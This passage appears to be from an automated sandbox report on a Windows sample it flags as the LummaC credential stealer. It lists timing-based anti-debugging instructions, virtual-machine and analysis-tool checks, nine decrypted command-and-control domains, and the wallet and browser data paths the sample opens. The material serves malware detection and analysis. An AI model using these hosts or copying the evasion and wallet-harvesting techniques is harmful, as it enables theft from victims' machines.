                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00CB9 second address: 4A00CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B216h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00CD3 second address: 4A00CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00CD9 second address: 4A00CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00D59 second address: 4A00D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00D5D second address: 4A00D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B20Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00D6C second address: 4A00DED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test al, al 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBF093632EDh 0x00000013 xor si, B146h 0x00000018 jmp 00007FBF093632F1h 0x0000001d popfd 0x0000001e popad 0x0000001f je 00007FBF7B9D6ECCh 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FBF093632F3h 0x0000002c sub ecx, 4D1C087Eh 0x00000032 jmp 00007FBF093632F9h 0x00000037 popfd 0x00000038 push ecx 0x00000039 mov ax, bx 0x0000003c pop ebx 0x0000003d popad 0x0000003e cmp dword ptr [ebp+08h], 00002000h 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00DED second address: 4A00DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00DF1 second address: 4A00DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A00DF5 second address: 4A00DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10A35 second address: 4A10AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBF093632EEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dx, 0AD4h 0x00000015 pushfd 0x00000016 jmp 00007FBF093632EDh 0x0000001b jmp 00007FBF093632EBh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FBF093632F4h 0x0000002a xor cl, FFFFFFB8h 0x0000002d jmp 00007FBF093632EBh 0x00000032 popfd 0x00000033 movzx ecx, di 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FBF093632EEh 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10AB2 second address: 4A10ADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B20Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007FBF0920B20Bh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FBF0920B20Bh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10ADF second address: 4A10AE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10AE5 second address: 4A10AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF0920B20Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10AF4 second address: 4A10AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10AF8 second address: 4A10BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FBF0920B215h 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 jmp 00007FBF0920B20Eh 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FBF0920B20Eh 0x0000001f jmp 00007FBF0920B215h 0x00000024 popfd 0x00000025 mov ebx, esi 0x00000027 popad 0x00000028 je 00007FBF7B878A6Bh 0x0000002e jmp 00007FBF0920B20Ah 0x00000033 cmp dword ptr [770E459Ch], 05h 0x0000003a pushad 0x0000003b mov si, 9A9Dh 0x0000003f pushfd 0x00000040 jmp 00007FBF0920B20Ah 0x00000045 xor esi, 26CD4FF8h 0x0000004b jmp 00007FBF0920B20Bh 0x00000050 popfd 0x00000051 popad 0x00000052 je 00007FBF7B890B11h 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FBF0920B215h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10BA9 second address: 4A10BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF093632ECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10BB9 second address: 4A10BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10C1A second address: 4A10C55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov ax, AE43h 0x0000000f jmp 00007FBF093632F8h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10C55 second address: 4A10C5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10C5B second address: 4A10C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10CA2 second address: 4A10CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10CA6 second address: 4A10CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FBF093632EEh 0x0000000c adc esi, 09C762F8h 0x00000012 jmp 00007FBF093632EBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop esi 0x0000001a jmp 00007FBF093632F6h 0x0000001f pop ebp 0x00000020 pushad 0x00000021 jmp 00007FBF093632EEh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4A10CF9 second address: 4A10CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSpecial instruction interceptor: First address: 2954AA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSpecial instruction interceptor: First address: 297975 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exe TID: 7680Thread sleep time: -34017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exe TID: 7652Thread sleep time: -32016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exe TID: 5980Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeLast function: Thread delayed
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: Amcache.hve.10.drBinary or memory string: VMware
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: fr2Mul3G6m.exe, 00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1431528606.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456632127.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1432099705.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510091812.0000000000B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: Amcache.hve.10.drBinary or memory string: vmci.sys
                Source: Amcache.hve.10.drBinary or memory string: VMware20,1
                Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: fr2Mul3G6m.exe, 00000005.00000002.2036474430.0000000000416000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: fr2Mul3G6m.exe, 00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1431528606.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456632127.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1432099705.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510091812.0000000000B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374749784.0000000005388000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
                Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.10.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: fr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: fr2Mul3G6m.exe, 00000005.00000002.2036474430.0000000000416000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: fr2Mul3G6m.exe, 00000005.00000003.1374989952.000000000537B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: SICE
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: fr2Mul3G6m.exe, 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
                Source: fr2Mul3G6m.exe, 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
                Source: fr2Mul3G6m.exe, 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
                Source: fr2Mul3G6m.exe, 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
                Source: fr2Mul3G6m.exe, 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
                Source: fr2Mul3G6m.exe, 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
                Source: fr2Mul3G6m.exe, 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
                Source: fr2Mul3G6m.exe, 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
                Source: fr2Mul3G6m.exe, 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: observerfry.lat
                Source: fr2Mul3G6m.exe, 00000005.00000002.2036846025.000000000045D000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: 5Program Manager
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: fr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456632127.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510091812.0000000000B4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: fr2Mul3G6m.exe PID: 7248, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: fr2Mul3G6m.exe, 00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                Source: fr2Mul3G6m.exe, 00000005.00000003.1431528606.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: fr2Mul3G6m.exe, 00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: fr2Mul3G6m.exe, 00000005.00000003.1431528606.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                Source: fr2Mul3G6m.exe, 00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: fr2Mul3G6m.exe, 00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: fr2Mul3G6m.exe, 00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: fr2Mul3G6m.exe, 00000005.00000003.1431492367.0000000000BAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: fr2Mul3G6m.exe, 00000005.00000002.2037865226.0000000000BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
